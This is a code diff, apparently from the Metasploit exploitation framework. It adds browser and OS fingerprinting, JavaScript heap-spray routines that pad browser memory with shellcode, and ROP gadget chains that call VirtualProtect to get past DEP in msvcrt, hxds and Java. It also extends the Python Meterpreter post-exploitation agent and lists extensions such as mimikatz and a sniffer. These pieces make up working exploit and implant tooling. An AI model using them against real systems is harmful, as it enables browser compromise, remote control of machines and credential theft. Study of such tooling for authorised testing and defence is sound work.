ua_version = '18.0' ua_version = '18.0';
} else if ('createElement' in document && } else if ('createElement' in document &&
document.createElement('iframe') && document.createElement('iframe') &&
'sandbox' in document.createElement('iframe')) { 'sandbox' in document.createElement('iframe')) {
ua_version = '17.0' ua_version = '17.0';
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) { } else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
ua_version = '16.0' ua_version = '16.0';
} else if ('HTMLSourceElement' in window && } else if ('HTMLSourceElement' in window &&
HTMLSourceElement.prototype && HTMLSourceElement.prototype &&
'media' in HTMLSourceElement.prototype) { 'media' in HTMLSourceElement.prototype) {
ua_version = '15.0' ua_version = '15.0';
} else if ('mozRequestPointerLock' in document.body) { } else if ('mozRequestPointerLock' in document.body) {
ua_version = '14.0' ua_version = '14.0';
} else if ('Map' in window) { } else if ('Map' in window) {
ua_version = "13.0" ua_version = "13.0";
} else if ('mozConnection' in navigator) { } else if ('mozConnection' in navigator) {
ua_version = "12.0"; ua_version = "12.0";
} else if ('mozVibrate' in navigator) { } else if ('mozVibrate' in navigator) {
@ -850,6 +867,12 @@ window.os_detect.getVersion = function(){
os_flavor = "7"; os_flavor = "7";
os_sp = "SP1"; os_sp = "SP1";
break; break;
case "10016720":
// IE 10.0.9200.16721 / Windows 7 SP1
ua_version = "10.0";
os_flavor = "7";
os_sp = "SP1";
break;
case "1000": case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release // IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0"; ua_version = "10.0";

17
data/js/memory/heap_spray.js Normal file
View File

@ -0,0 +1,17 @@
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}

31
data/js/memory/mstime_malloc.js Normal file
View File

@ -0,0 +1,31 @@
function mstime_malloc(oArg) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
var buf = "";
for (var i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";#W00TA";
}
}
var e = document.getElementById(objId);
if (e == null) {
var eleId = "W00TB"
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}

38
data/js/memory/property_spray.js Normal file
View File

@ -0,0 +1,38 @@
var sym_div_container;
function sprayHeap( oArg ) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var maxAllocs = oArg.maxAllocs;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
sym_div_container = document.getElementById(objId);
if (sym_div_container == null) {
sym_div_container = document.createElement("div");
}
sym_div_container.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
sym_div_container.appendChild(obj);
}
}

18
data/js/network/ajax_download.js Normal file
View File

@ -0,0 +1,18 @@
function ajax_download(oArg) {
if (!oArg.method) { oArg.method = "GET"; }
if (!oArg.path) { throw "Missing parameter 'path'"; }
if (!oArg.data) { oArg.data = null; }
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(oArg.method, oArg.path, false);
xmlHttp.send(oArg.data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}

10
data/js/network/ajax_post.js Normal file
View File

@ -0,0 +1,10 @@
function postInfo(path, data) {
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open('POST', path, false);
xmlHttp.send(data);
}

15
data/js/network/xhr_shim.js Normal file
View File

@ -0,0 +1,15 @@
if (!window.XMLHTTPRequest) {
(function() {
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
for (idx = 0; idx < activeObjs.length; idx++) {
try {
new ActiveXObject(activeObjs[idx]);
window.XMLHttpRequest = function() {
return new ActiveXObject(activeObjs[idx]);
};
break;
}
catch (e) {}
}
})();
}

126
data/js/utils/base64.js Normal file
View File

@ -0,0 +1,126 @@
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\r\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};

BIN
data/meterpreter/common.lib Executable file
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_networkpug.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.lso
View File

Binary file not shown.

67
data/meterpreter/ext_server_stdapi.py
View File

@ -149,6 +149,8 @@ TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440 TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441 TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442 TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
# Socket # Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500 TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
@ -273,6 +275,9 @@ ERROR_FAILURE = 1
# errors. # errors.
ERROR_CONNECTION_ERROR = 10000 ERROR_CONNECTION_ERROR = 10000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
def get_stat_buffer(path): def get_stat_buffer(path):
si = os.stat(path) si = os.stat(path)
rdev = 0 rdev = 0
@ -290,6 +295,27 @@ def get_stat_buffer(path):
st_buf += struct.pack('<II', blksize, blocks) st_buf += struct.pack('<II', blksize, blocks)
return st_buf return st_buf
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
family = address_info[0]
address = address_info[4][0]
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
def windll_GetNativeSystemInfo(): def windll_GetNativeSystemInfo():
if not has_windll: if not has_windll:
return None return None
@ -687,6 +713,40 @@ def stdapi_fs_stat(request, response):
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf) response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
result = resolve_host(hostname, family)
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_hosts(request, response):
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
hostname = hostname['value']
try:
result = resolve_host(hostname, family)
except socket.error:
result = {'family':family, 'packed_address':''}
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function @meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response): def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID) channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
@ -842,9 +902,12 @@ def stdapi_registry_query_value(request, response):
if value_type.value == REG_SZ: if value_type.value == REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
elif value_type.value == REG_DWORD: elif value_type.value == REG_DWORD:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4]) value = value_data[:4]
value.reverse()
value = ''.join(map(chr, value))
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else: else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value]) response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
return ERROR_FAILURE, response return ERROR_FAILURE, response

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

20
data/meterpreter/meterpreter.py
View File

@ -111,6 +111,24 @@ def packet_get_tlv(pkt, tlv_type):
offset += tlv[0] offset += tlv[0]
return {} return {}
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
raise StopIteration()
def tlv_pack(*args): def tlv_pack(*args):
if len(args) == 2: if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]} tlv = {'type':args[0], 'value':args[1]}
@ -271,7 +289,7 @@ class PythonMeterpreter(object):
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys() preloadlib_methods = self.extension_functions.keys()
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess}) i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i.runcode(compile(data_tlv['value'], '', 'exec')) i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys() postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/msflinker_linux_x86.bin
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll
View File

Binary file not shown.

36
data/msfcrawler/basic.rb
View File

@ -18,29 +18,29 @@ require 'uri'
class CrawlerSimple < BaseParser class CrawlerSimple < BaseParser
def parse(request,result) def parse(request,result)
if !result['Content-Type'].include? "text/html" if !result['Content-Type'].include? "text/html"
return return
end end
doc = Hpricot(result.body.to_s) doc = Hpricot(result.body.to_s)
doc.search('a').each do |link| doc.search('a').each do |link|
hr = link.attributes['href'] hr = link.attributes['href']
if hr and !hr.match(/^(\#|javascript\:)/) if hr and !hr.match(/^(\#|javascript\:)/)
begin begin
hreq = urltohash('GET',hr,request['uri'],nil) hreq = urltohash('GET',hr,request['uri'],nil)
insertnewpath(hreq) insertnewpath(hreq)
rescue URI::InvalidURIError rescue URI::InvalidURIError
#puts "Parse error" #puts "Parse error"
#puts "Error: #{link[0]}" #puts "Error: #{link[0]}"
end end
end end
end end
end end
end end

76
data/msfcrawler/forms.rb
View File

@ -18,60 +18,60 @@ require 'uri'
class CrawlerForms < BaseParser class CrawlerForms < BaseParser
def parse(request,result) def parse(request,result)
if !result['Content-Type'].include? "text/html" if !result['Content-Type'].include? "text/html"
return return
end end
hr = '' hr = ''
m = '' m = ''
doc = Hpricot(result.body.to_s) doc = Hpricot(result.body.to_s)
doc.search('form').each do |f| doc.search('form').each do |f|
hr = f.attributes['action'] hr = f.attributes['action']
fname = f.attributes['name'] fname = f.attributes['name']
if fname.empty? if fname.empty?
fname = "NONE" fname = "NONE"
end end
m = "GET" m = "GET"
if !f.attributes['method'].empty? if !f.attributes['method'].empty?
m = f.attributes['method'].upcase m = f.attributes['method'].upcase
end end
#puts "Parsing form name: #{fname} (#{m})" #puts "Parsing form name: #{fname} (#{m})"
htmlform = Hpricot(f.inner_html) htmlform = Hpricot(f.inner_html)
arrdata = [] arrdata = []
htmlform.search('input').each do |p| htmlform.search('input').each do |p|
#puts p.attributes['name'] #puts p.attributes['name']
#puts p.attributes['type'] #puts p.attributes['type']
#puts p.attributes['value'] #puts p.attributes['value']
#raw_request has uri_encoding disabled as it encodes '='. #raw_request has uri_encoding disabled as it encodes '='.
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value'])) arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
end end
data = arrdata.join("&").to_s data = arrdata.join("&").to_s
begin begin
hreq = urltohash(m,hr,request['uri'],data) hreq = urltohash(m,hr,request['uri'],data)
hreq['ctype'] = 'application/x-www-form-urlencoded' hreq['ctype'] = 'application/x-www-form-urlencoded'
insertnewpath(hreq) insertnewpath(hreq)
rescue URI::InvalidURIError rescue URI::InvalidURIError
#puts "Parse error" #puts "Parse error"
#puts "Error: #{link[0]}" #puts "Error: #{link[0]}"
end end
end end
end end
end end

34
data/msfcrawler/frames.rb
View File

@ -14,28 +14,28 @@ require 'uri'
class CrawlerFrames < BaseParser class CrawlerFrames < BaseParser
def parse(request,result) def parse(request,result)
if !result['Content-Type'].include? "text/html" if !result['Content-Type'].include? "text/html"
return return
end end
doc = Hpricot(result.body.to_s) doc = Hpricot(result.body.to_s)
doc.search('iframe').each do |ifra| doc.search('iframe').each do |ifra|
ir = ifra.attributes['src'] ir = ifra.attributes['src']
if ir and !ir.match(/^(\#|javascript\:)/) if ir and !ir.match(/^(\#|javascript\:)/)
begin begin
hreq = urltohash('GET',ir,request['uri'],nil) hreq = urltohash('GET',ir,request['uri'],nil)
insertnewpath(hreq) insertnewpath(hreq)
rescue URI::InvalidURIError rescue URI::InvalidURIError
#puts "Error" #puts "Error"
end end
end end
end end
end end
end end

36
data/msfcrawler/image.rb
View File

@ -15,29 +15,29 @@ require 'uri'
class CrawlerImage < BaseParser class CrawlerImage < BaseParser
def parse(request,result) def parse(request,result)
if !result['Content-Type'].include? "text/html" if !result['Content-Type'].include? "text/html"
return return
end end
doc = Hpricot(result.body.to_s) doc = Hpricot(result.body.to_s)
doc.search('img').each do |i| doc.search('img').each do |i|
im = i.attributes['src'] im = i.attributes['src']
if im and !im.match(/^(\#|javascript\:)/) if im and !im.match(/^(\#|javascript\:)/)
begin begin
hreq = urltohash('GET',im,request['uri'],nil) hreq = urltohash('GET',im,request['uri'],nil)
insertnewpath(hreq) insertnewpath(hreq)
rescue URI::InvalidURIError rescue URI::InvalidURIError
#puts "Parse error" #puts "Parse error"
#puts "Error: #{i[0]}" #puts "Error: #{i[0]}"
end end
end end
end end
end end
end end

36
data/msfcrawler/link.rb
View File

@ -15,29 +15,29 @@ require 'uri'
class CrawlerLink < BaseParser class CrawlerLink < BaseParser
def parse(request,result) def parse(request,result)
if !result['Content-Type'].include? "text/html" if !result['Content-Type'].include? "text/html"
return return
end end
doc = Hpricot(result.body.to_s) doc = Hpricot(result.body.to_s)
doc.search('link').each do |link| doc.search('link').each do |link|
hr = link.attributes['href'] hr = link.attributes['href']
if hr and !hr.match(/^(\#|javascript\:)/) if hr and !hr.match(/^(\#|javascript\:)/)
begin begin
hreq = urltohash('GET',hr,request['uri'],nil) hreq = urltohash('GET',hr,request['uri'],nil)
insertnewpath(hreq) insertnewpath(hreq)
rescue URI::InvalidURIError rescue URI::InvalidURIError
#puts "Parse error" #puts "Parse error"
#puts "Error: #{link[0]}" #puts "Error: #{link[0]}"
end end
end end
end end
end end
end end

36
data/msfcrawler/objects.rb
View File

@ -18,31 +18,31 @@ require 'uri'
class CrawlerObjects < BaseParser class CrawlerObjects < BaseParser
def parse(request,result) def parse(request,result)
if !result['Content-Type'].include? "text/html" if !result['Content-Type'].include? "text/html"
return return
end end
hr = '' hr = ''
m = '' m = ''
doc = Hpricot(result.body.to_s) doc = Hpricot(result.body.to_s)
doc.search("//object/embed").each do |obj| doc.search("//object/embed").each do |obj|
s = obj['src'] s = obj['src']
begin begin
hreq = urltohash('GET',s,request['uri'],nil) hreq = urltohash('GET',s,request['uri'],nil)
insertnewpath(hreq) insertnewpath(hreq)
rescue URI::InvalidURIError rescue URI::InvalidURIError
#puts "Parse error" #puts "Parse error"
#puts "Error: #{link[0]}" #puts "Error: #{link[0]}"
end end
end end
end end
end end

36
data/msfcrawler/scripts.rb
View File

@ -18,31 +18,31 @@ require 'uri'
class CrawlerScripts < BaseParser class CrawlerScripts < BaseParser
def parse(request,result) def parse(request,result)
if !result['Content-Type'].include? "text/html" if !result['Content-Type'].include? "text/html"
return return
end end
hr = '' hr = ''
m = '' m = ''
doc = Hpricot(result.body.to_s) doc = Hpricot(result.body.to_s)
doc.search("//script").each do |obj| doc.search("//script").each do |obj|
s = obj['src'] s = obj['src']
begin begin
hreq = urltohash('GET',s,request['uri'],nil) hreq = urltohash('GET',s,request['uri'],nil)
insertnewpath(hreq) insertnewpath(hreq)
rescue URI::InvalidURIError rescue URI::InvalidURIError
#puts "Parse error" #puts "Parse error"
#puts "Error: #{link[0]}" #puts "Error: #{link[0]}"
end end
end end
end end
end end

66
data/ropdb/hxds.xml Normal file
View File

@ -0,0 +1,66 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>2007</target>
</compatibility>
<gadgets base="0x51bd0000">
<gadget offset="0x000750fd">POP EAX # RETN</gadget>
<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget>
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
<gadget value="ffffffc0">0x00000040</gadget>
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x000406e9">POP ECX # RETN</gadget>
<gadget offset="0x0008bfae">Writable location</gadget>
<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
<gadget offset="0x0002c840">JMP [EAX]</gadget>
<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>2010</target>
</compatibility>
<gadgets base="0x51bd0000">
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0002a429">POP EDX # RETN</gadget>
<gadget value="ffffffc0">0x00000040</gadget>
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
<gadget offset="0x0008c638">Writable location</gadget>
<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
<gadget offset="0x00073335">POP ESI # RETN</gadget>
<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
<gadget offset="0x00076452">POP EAX # RETN</gadget>
<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
</gadgets>
</rop>
</db>

2
data/ropdb/java.xml
View File

@ -9,7 +9,7 @@
<gadget offset="0x00024c66">POP EBP # RETN</gadget> <gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget> <gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget> <gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="FFFFFBFF">0x00000201</gadget> <gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget> <gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget> <gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget> <gadget value="0xffffffff"></gadget>

53
data/ropdb/msvcrt.xml
View File

@ -7,12 +7,21 @@
</compatibility> </compatibility>
<gadgets base="0x77c10000"> <gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
